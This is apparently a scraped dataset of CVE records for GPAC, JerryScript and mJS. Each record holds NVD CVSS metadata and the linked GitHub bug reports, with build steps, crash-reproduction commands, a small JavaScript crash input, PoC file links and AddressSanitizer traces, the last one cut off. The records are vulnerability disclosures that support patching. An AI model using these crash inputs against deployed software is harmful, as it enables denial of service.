https://github.com/axiomatic-systems/Bento4/issues/643
978,627,371
643
CVE-2021-40944
2022-06-28T13:15:09.963
In GPAC MP4Box 1.1.0, there is a Null pointer reference in the function gf_filter_pid_get_packet function in src/filter_core/filter_pid.c:5394, as demonstrated by GPAC. This can cause a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1906" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "13133329-701B-4D4B-BA02-F2DF80638668", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1906
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...) Step to reproduce: ``` 1.get latest commit code (GPAC version 1.1.0-DEV-rev1170-g592ba2689-master) 2.compile with --enable-sanitizer 3.run ./gpac nhmlr:reframe=1:gpac:index=1.0:gpac:src= ``` **Im not sure if it's a correct usage of "nhmlr filter" , or by which way could i parse nhml file?** Env: Ubunut 20.04 , clang 12.0.1 ASAN report ``` ==2311904==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fa16d0fb321 bp 0x7fff730acdb0 sp 0x7fff730acc20 T0) ==2311904==The signal is caused by a READ memory access. ==2311904==Hint: address points to the zero page. #0 0x7fa16d0fb321 in gf_filter_pid_get_packet /home/lly/pro/gpac_public/src/filter_core/filter_pid.c:5394:6 #1 0x7fa16d22468a in nhmldmx_process /home/lly/pro/gpac_public/src/filters/dmx_nhml.c:1320:8 #2 0x7fa16d15a431 in gf_filter_process_task /home/lly/pro/gpac_public/src/filter_core/filter.c:2441:7 #3 0x7fa16d13d2a7 in gf_fs_thread_proc /home/lly/pro/gpac_public/src/filter_core/filter_session.c:1640:3 #4 0x7fa16d13c850 in gf_fs_run /home/lly/pro/gpac_public/src/filter_core/filter_session.c:1877:2 #5 0x4d12ed in gpac_main /home/lly/pro/gpac_public/applications/gpac/main.c:2254:7 #6 0x7fa16c0210b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41fe0d in _start (/home/lly/pro/gpac_public/bin/gcc/gpac+0x41fe0d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/lly/pro/gpac_public/src/filter_core/filter_pid.c:5394:6 in gf_filter_pid_get_packet ```
Null pointer reference in GPAC at src/filter_core/filter_pid.c:5394
https://api.github.com/repos/gpac/gpac/issues/1906/comments
4
2021-09-01T07:25:03Z
2021-09-07T15:18:06Z
https://github.com/gpac/gpac/issues/1906
984,803,968
1,906
CVE-2022-32117
2022-07-13T21:15:08.123
Jerryscript v2.4.0 was discovered to contain a stack buffer overflow via the function jerryx_print_unhandled_exception in /util/print.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5008" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/5008
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 0d4969661810b9e618485c284c361e597144e9b9 master ###### Build platform Ubuntu 16.04.7 LTS (Linux 4.15.0-142-generic x86_64) ###### Build steps ```sh ./tools/build.py --clean --compile-flag=-fsanitize=address --lto=off --error-message=on --profile=es.next --stack-limit=15 --debug --logging=on --line-info=on ``` ###### Test case ```javascript for (let __v1 = 0; __v1 < 10000; __v1++) { ['__v6', '__v2', '__v1', '__v3', '__v4', '__v5'];" __v5(__v1, } ``` ```sh ==112046==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda03d5390 at pc 0x7fa6aae1ea7d bp 0x7ffda03d5240 sp 0x7ffda03d49e8 READ of size 1 at 0x7ffda03d5390 thread T0 #0 0x7fa6aae1ea7c in __interceptor_strtol (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x75a7c) #1 0x581203 in jerryx_print_unhandled_exception /home/lily/Desktop/67/jerryscript/jerry-ext/util/print.c:247 #2 0x4027c1 in main /home/lily/Desktop/67/jerryscript/jerry-main/main-desktop.c:172 #3 0x7fa6aa6f683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #4 0x401e88 in _start (/home/lily/Desktop/67/jerry+0x401e88) Address 0x7ffda03d5390 is located in stack of thread T0 at offset 224 in frame #0 0x580e99 in jerryx_print_unhandled_exception /home/lily/Desktop/67/jerryscript/jerry-ext/util/print.c:204 This frame has 3 object(s): [32, 36) 'source_size' [96, 104) 'current_p' [160, 224) 'buffer_p' <== Memory access at offset 224 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 __interceptor_strtol Shadow bytes around the buggy address: 0x100034072a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072a50: 00 00 00 00 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 0x100034072a60: f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 00 00 00 00 00 =>0x100034072a70: 00 00[f3]f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 0x100034072a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034072ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==112046==ABORTING
Stack-buffer-overflow in jerryx_print_unhandled_exception (jerryscript/jerry-ext/util/print.c)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5008/comments
1
2022-05-29T18:17:00Z
2022-08-08T06:14:38Z
https://github.com/jerryscript-project/jerryscript/issues/5008
1,251,957,111
5,008
CVE-2021-33437
2022-07-26T13:15:08.487
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There are memory leaks in frozen_cb() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/160" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/160
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-5794-frozen_cb-memory-leak ASAN info: ```C ==29407==ERROR: LeakSanitizer: detected memory leaks Direct leak of 37331 byte(s) in 1 object(s) allocated from: #0 0x7f151fe52602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x42ffcd in frozen_cb test/mjs-uaf/build_asan/mjs.c:12025 #2 0x4092c4 in json_parse_string test/mjs-uaf/build_asan/mjs.c:5898 #3 0x40b482 in json_parse_value test/mjs-uaf/build_asan/mjs.c:5993 #4 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #5 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #6 0x40b863 in json_parse_pair test/mjs-uaf/build_asan/mjs.c:6058 #7 0x40bc63 in json_parse_object test/mjs-uaf/build_asan/mjs.c:6070 #8 0x40b4a3 in json_parse_value test/mjs-uaf/build_asan/mjs.c:5996 #9 0x40c135 in json_doit test/mjs-uaf/build_asan/mjs.c:6083 #10 0x40f2aa in json_walk test/mjs-uaf/build_asan/mjs.c:6466 #11 0x4309d9 in mjs_json_parse test/mjs-uaf/build_asan/mjs.c:12133 #12 0x430f11 in mjs_op_json_parse test/mjs-uaf/build_asan/mjs.c:12193 #13 0x42572a in mjs_execute test/mjs-uaf/build_asan/mjs.c:9648 #14 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #15 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #16 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #17 0x7f151f80c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: 37331 byte(s) leaked in 1 allocation(s). ```
AddressSanitizer: 1 memory leaks of frozen_cb()
https://api.github.com/repos/cesanta/mjs/issues/160/comments
0
2021-05-19T08:38:25Z
2021-05-19T08:38:25Z
https://github.com/cesanta/mjs/issues/160
895,159,181
160
CVE-2021-33438
2022-07-26T13:15:08.630
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow in json_parse_array() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/158" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/158
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-5fb78-json_parse_array-stack-overflow ASAN info: ```C ASAN:SIGSEGV ================================================================= ==29997==ERROR: AddressSanitizer: stack-overflow on address 0x7ffecd8c9eb8 (pc 0x7f833297cb79 bp 0x7ffecd8ca770 sp 0x7ffecd8c9ec0 T0) #0 0x7f833297cb78 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x5fb78) #1 0x7f833297e145 in __interceptor_vsnprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x61145) #2 0x7f833297e3b1 in snprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x613b1) #3 0x40a934 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5952 #4 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #5 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #6 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #7 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #8 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #9 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #10 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #11 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #12 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #13 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #14 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #15 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #16 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #17 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #18 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #19 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #20 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #21 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #22 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #23 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #24 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #25 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #26 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #27 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #28 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #29 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #30 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #31 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #32 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #33 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #34 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #35 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #36 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #37 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #38 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #39 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #40 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #41 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #42 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #43 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #44 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #45 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #46 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #47 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #48 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #49 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #50 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #51 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #52 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #53 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #54 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #55 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #56 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #57 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #58 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #59 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #60 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #61 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #62 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #63 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #64 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #65 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #66 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #67 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #68 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #69 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #70 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #71 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #72 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #73 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #74 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #75 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #76 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #77 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #78 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #79 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #80 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #81 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #82 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #83 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #84 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #85 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #86 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #87 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #88 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #89 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #90 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #91 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #92 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #93 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #94 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #95 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #96 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #97 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #98 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #99 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #100 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #101 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #102 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #103 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #104 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #105 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #106 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #107 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #108 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #109 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #110 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #111 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #112 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #113 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #114 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #115 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #116 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #117 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #118 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #119 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #120 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #121 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #122 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #123 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #124 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #125 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #126 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #127 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #128 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #129 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #130 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #131 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #132 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #133 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #134 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #135 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #136 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #137 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #138 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #139 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #140 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #141 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #142 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #143 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #144 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #145 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #146 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #147 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #148 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #149 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #150 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #151 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #152 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #153 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #154 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #155 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #156 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #157 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #158 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #159 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #160 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #161 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #162 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #163 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #164 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #165 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #166 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #167 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #168 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #169 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #170 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #171 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #172 0x40b4c4 in json_parse_value 